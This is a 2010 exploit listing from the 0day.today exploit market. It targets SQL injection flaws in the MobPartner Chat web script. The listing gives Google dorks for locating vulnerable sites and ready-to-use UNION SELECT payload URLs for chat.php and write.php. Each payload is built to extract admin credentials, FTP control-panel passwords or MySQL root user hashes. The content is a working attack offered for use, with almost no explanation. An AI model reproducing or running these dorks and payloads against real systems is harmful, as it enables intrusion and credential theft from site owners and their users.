[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MobPartner Chat Multiple Sql Injection Vulnerabilities

Author
AtT4CKxT3rR0r1ST
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10754
Category
web applications
Date add
02-02-2010
Platform
unsorted
======================================================
MobPartner Chat Multiple Sql Injection Vulnerabilities
======================================================

.:. Script         : MobPartner
.:. Download Script: http://www.mobpartner.com/services/chat/?wsid=32174
.:. Bug Type       : Sql Injection [Mysql]
.:. Dork           : [1]"Powered by MobPartner" inurl:"chat.php"
                       [2]"Powered by MobPartner" inurl:"write.php"
####################################################################
 
===[ Exploit ]===
 
www.site.com/chat.php?id=[SQL INJECTION]
www.site.com/write.php?id=[SQL INJECTION]
 
********************************************************************
 T0 Get Username & Password Admin Site
 
[Sql Injection ; {Username & password Admin}]
 
www.site.com/chat.php?id=null+and+1=2+union+select+1,concat(id,0x3a,username,0x3a,password),3,4,5,6+from+texad_admin.users--
www.site.com/write.php?id=null+and+1=2+union+select+1,concat(id,0x3a,username,0x3a,password),3,4,5,6+from+texad_admin.users--
 
 
********************************************************************
 T0 Get Username & Password FTP Control Panel
 
[Sql Injection ; {Username & Password FTP Control Panel}]
 
www.site.com/chat.php?id=null+and+1=2+union+select+1,concat(user,0x3a,password),3,4,5,6+from+pureftpd.ftpd--
www.site.com/write.php?id=null+and+1=2+union+select+1,concat(user,0x3a,password),3,4,5,6+from+pureftpd.ftpd--
 
 
********************************************************************
 T0 Get Username & Password Root Server
 
[Sql Injection ; {Username & Password Root Server}]
 
www.site.com/chat.php?id=null+and+1=2+union+select+1,concat(host,0x3a,user,0x3a,password),3,4,5,6+from+mysql.user--
www.site.com/write.php?id=null+and+1=2+union+select+1,concat(host,0x3a,user,0x3a,password),3,4,5,6+from+mysql.user--
 
####################################################################



#  0day.today [2024-11-16]  #